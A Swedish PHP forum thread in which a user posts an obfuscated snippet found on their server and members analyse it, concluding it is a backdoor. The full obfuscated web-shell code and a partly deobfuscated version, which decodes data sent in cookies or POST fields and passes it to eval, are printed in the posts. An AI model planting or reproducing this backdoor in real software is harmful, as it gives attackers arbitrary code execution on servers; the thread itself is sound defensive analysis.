Skadlig kod?

PHPportalen Forum Index » PHP
Lägg ett bokmärke på hela tråden
Skapa nytt inlägg   Svara på inlägget
Visa föregående ämne :: Visa nästa ämne  
Startad av: Meddelande
marcusgarden



Medlem i: 3199 dagar

Status: Offline



#742263
Inlägg Skrivet: 2018-08-12 22:48      Ämne: Skadlig kod? Citera

Hittat en kodsnutt, förmodligen skadlig, vad gör den?

KOD:
1:
$nadpavw = 'e9pua0tfH#\'rnsi3gv_b15m*xdklyc4-o68';$rgxmnw = Array();$rgxmnw[] = $nadpavw[5].$nadpavw[20].$nadpavw[19].$nadpavw[21].$nadpavw[0].$nadpavw[4].$nadpavw[29].$nadpavw[4].$nadpavw[31].$nadpavw[30].$nadpavw[4].$nadpavw[21].$nadpavw[1].$nadpavw[31].$nadpavw[30].$nadpavw[4].$nadpavw[29].$nadpavw[21].$nadpavw[31].$nadpavw[34].$nadpavw[29].$nadpavw[5].$nadpavw[15].$nadpavw[31].$nadpavw[20].$nadpavw[30].$nadpavw[7].$nadpavw[29].$nadpavw[19].$nadpavw[20].$nadpavw[5].$nadpavw[19].$nadpavw[4].$nadpavw[33].$nadpavw[19].$nadpavw[0];$rgxmnw[] = $nadpavw[8].$nadpavw[23];$rgxmnw[] = $nadpavw[9];$rgxmnw[] = $nadpavw[29].$nadpavw[32].$nadpavw[3].$nadpavw[12].$nadpavw[6];$rgxmnw[] = $nadpavw[13].$nadpavw[6].$nadpavw[11].$nadpavw[18].$nadpavw[11].$nadpavw[0].$nadpavw[2].$nadpavw[0].$nadpavw[4].$nadpavw[6];$rgxmnw[] = $nadpavw[0].$nadpavw[24].$nadpavw[2].$nadpavw[27].$nadpavw[32].$nadpavw[25].$nadpavw[0];$rgxmnw[] = $nadpavw[13].$nadpavw[3].$nadpavw[19].$nadpavw[13].$nadpavw[6].$nadpavw[11];$rgxmnw[] = $nadpavw[4].$nadpavw[11].$nadpavw[11].$nadpavw[4].$nadpavw[28].$nadpavw[18].$nadpavw[22].$nadpavw[0].$nadpavw[11].$nadpavw[16].$nadpavw[0];$rgxmnw[] = $nadpavw[13].$nadpavw[6].$nadpavw[11].$nadpavw[27].$nadpavw[0].$nadpavw[12];$rgxmnw[] = $nadpavw[2].$nadpavw[4].$nadpavw[29].$nadpavw[26];foreach ($rgxmnw[7]($_COOKIE, $_POST) as $zgtpci => $ubojzr){function yldsh($rgxmnw, $zgtpci, $bnzkw){return $rgxmnw[6]($rgxmnw[4]($zgtpci . $rgxmnw[0], ($bnzkw / $rgxmnw[8]($zgtpci)) + 1), 0, $bnzkw);}function snlvp($rgxmnw, $xdukpg){return @$rgxmnw[9]($rgxmnw[1], $xdukpg);}function kbhbg($rgxmnw, $xdukpg){$ngovlsq = $rgxmnw[3]($xdukpg) % 3;if (!$ngovlsq) {eval($xdukpg[1]($xdukpg[2]));exit();}}$ubojzr = snlvp($rgxmnw, $ubojzr);kbhbg($rgxmnw, $rgxmnw[5]($rgxmnw[2], $ubojzr ^ yldsh($rgxmnw, $zgtpci, $rgxmnw[8]($ubojzr))));}
 
Till toppen på sidan
Visa användarprofil Skicka privat meddelande
Azreal
Administratör



Medlem i: 4919 dagar
Från: Uppsala, bor i Göteborg
Status: Offline



#742264
Inlägg Skrivet: 2018-08-13 07:23      Ämne: Citera

Eftersom eval finns med i kodsnutten så är det nog kod som genererar kod för att köras just med eval.
Exakt vad/vilken kod är lite jobbigare att läsa ut då angriparen gjort det svårt att läsa Smile

Jag hade nog testat köra koden i en miljö som är skyddad för att se exakt vad som genereras.
 

_________________
Konsultation via PM, inte gratis.
Till toppen på sidan
Visa användarprofil Skicka privat meddelande Besök användarens hemsida
IsterBulle



Medlem i: 5017 dagar

Status: Offline



#742481
Inlägg Skrivet: 2019-02-19 05:23      Ämne: Citera

Jag satte igång att förenkla koden lite grann, och så här långt kom jag. Eventuellt så kan det ha blivit fel någonstans för jag begriper inte riktigt vad den gör. I min devmiljö händer iaf ingenting, men det beror på att jag inte hade något i $_SESSION och $_POST.

Jag antar att syftet är att sno en nonce eller liknande som finns i en cookie, för att kunna komma åt en adminpanel eller liknande. Vilket CMS var det i detta fall?

PHP:
1:
 foreach(array_merge($_COOKIE$_POST) as $zgtpci => $ubojzr)
2:
   {
3:
   
4:
   $ubojzr = @pack('H*'$ubojzr);
5:
   
6:
   $xdukpg explode('#'$ubojzr substr(str_repeat($zgtpci '01b5eaca-4a59-4ac5-8c03-14fcb10ba6be', (strlen($ubojzr) / strlen($zgtpci)) + 1) , 0strlen($ubojzr)));
7:
 
8:
      $ngovlsq count($xdukpg) % 3;
9:
      if (!$ngovlsq)
10:
         {
11:
         eval($xdukpg[1]($xdukpg[2]));
12:
         exit();
13:
         }
14:
   
 

_________________
Hej! Jag säljer duschdraperier och solglasögon i trä
Till toppen på sidan
Visa användarprofil Skicka privat meddelande
harald_b
Moderator



Medlem i: 4660 dagar
Från: Tavesta
Status: Offline



#742484
Inlägg Skrivet: 2019-02-19 13:00      Ämne: Citera

Vad jag kan se så är koden en bakdörr som gör att kodens skapare kan köra vilken kod han vill på din server genom att skicka den med $_POST eller $_COOKIE i krypterat format.
 

_________________
R.r - Ett fritt affärssystem
Till toppen på sidan
Visa användarprofil Skicka privat meddelande
Visa tidigare inlägg:   
Skapa nytt inlägg   Svara på inlägget
PHPportalen Forum Index » PHP
Hoppa till:  
Du kan inte skapa nya inlägg i det här forumet
Du kan inte svara på inlägg i det här forumet
Du kan inte ändra dina inlägg i det här forumet
Du kan inte ta bort dina inlägg i det här forumet
Du kan inte rösta i det här forumet
Du kan inte bifoga filer i detta forum
Du kan inte ladda ner filer från detta forum
Kontakta oss på adressen: info@phpportalen.net
Webbplatsen bygger i grunden på phpBB © 2001, 2002 phpBB Group

Modifieringar har senare gjorts i systemet av PHPportalen
Sid och logotypdesign skapad av Daren Jularic